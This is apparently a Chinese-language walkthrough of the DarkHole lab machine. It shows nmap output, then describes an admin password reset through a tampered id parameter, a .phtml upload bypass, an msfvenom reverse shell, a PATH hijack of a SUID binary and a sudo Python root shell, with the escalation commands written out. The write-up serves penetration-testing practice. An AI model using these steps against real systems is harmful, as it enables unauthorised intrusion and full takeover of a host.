一.nmap扫描

┌──[HQ🚀192.168.2.131⚔️root]
└──╼[👾]/home/xianyu/桌面 $ nmap -sS -p- -O -A 192.168.2.134
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:19 EST
Nmap scan report for 192.168.2.134
Host is up (0.00047s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e450d9505d913050e9b57dcab051db74 (RSA)
|   256 730c76866063060021c236203b99c1f7 (ECDSA)
|_  256 54534c3f4f3a26f602aa9a24ea1b928c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: DarkHole
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 00:0C:29:A8:91:14 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.2.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.54 seconds

二.访问80端口WEB服务

对目录进行扫描

关键目录

192.168.2.134/login.php

192.168.2.134/register.php

域名192.168.2.134/register.php为网站注册网址，尝试注册新用户进行登录

后台拥有更改用户密码功能，抓取数据包，发现数据包中“id”参数对应用户

尝试修改id值，发现此处存在垂直越权漏洞，通过将id值修改为1能够将网站管理员admin密码修改

登录admin账户

发现后台上传点，尝试上传木马getshell

上传点为js前端验证+后端黑名单验证，尝试使用后缀名绕过黑名单。

phtml后缀上传成功，使用msfvenom生成木马进行后渗透

载入监听模块，选择对应payload，设置监听机ip以及端口，开始攻击

web站点访问木马，使网站解析木马文件，建立tcp反向链接

通过python中的pty模块建立交互shell

通过查找敏感文件，发现/home/john目录下toto文件suid权限，并且此文件归属者为root，作用为输出id，通过修改变量，使执行toto文件时，会给反弹出用户john的bash

echo "/bin/bash" > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH

执行toto文件，获取john用户权限，查看Password，获取john用户密码，执行sudo -l

命令，发现用户john可以用root权限执行目录下file.py文件

清空file.py文件内容，利用pty模块反弹root的bash窗口

cat /dev/null file.py

echo “import pty;pty.spawn(‘/bin/bash’)” > file.py

sudo python3 /home/john/file.py

成功获取root权限